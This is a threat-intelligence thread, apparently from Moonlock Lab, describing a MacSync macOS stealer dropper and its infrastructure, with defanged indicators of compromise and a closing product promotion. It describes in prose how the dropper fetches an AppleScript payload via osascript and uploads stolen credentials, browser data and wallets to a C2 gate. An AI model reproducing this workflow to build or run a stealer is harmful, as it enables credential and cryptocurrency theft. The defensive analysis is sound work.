1/ Sometimes the best hunts start with a simple share. A few strings from an updated #MacSync #macOS malware, dropped casually by @g0njxa, led us to the FUD file, which appears to be a dropper 👇
@g0njxa 2/ The script reaches out to filebreef[.]com with hardcoded authentication tokens. It fetches an AppleScript payload and executes it via osascript. The stolen credentials, browser data, and wallet information get compressed into osalogging\.zip and uploaded to the /gate path.
3/ But here's where it gets interesting: this sample isn't alone. We pivoted to the network indicators and checked what else is talking to the same infrastructure. The IP address reveals a disturbing pattern – 13 distinct malware samples, all uploaded within the last four days.
4/ Among those 13 communicating samples, we see a fake #TrezorSuite application as well, we already described how it works here 👉 https://x.com/moonlock_lab/sta...
5/ Then we checked our lab's telemetry: over the past 72 hours alone, we've identified 40+ unique MacSync samples. It becomes clear that the threat actor started using an automated workflow to generate samples at scale. A nice collection was prepared by @txhaflaire just a
IOC 🧙 [Network] 45.159.79[.]219 (AS 400992) filebreef[.]com (main loader C2) borkdeal[.]com (Trezor phishing) [Files] c3178905a95a5037110f65343378eb562221a8d7c5cbb986b9674609d33e59d6 0c10b41852c60aa55e5ee3338347be89233072c36852db18f900891c5e3fa714
It's amazing to see our work come to life! At Moonlock Lab, we dig deep into macOS malware. Now, with the Moonlock app by @MacPaw, that deep technical insight is turning into real, easy-to-use security for everyone. We hope you feel safer! 🔒 https://moonlock.com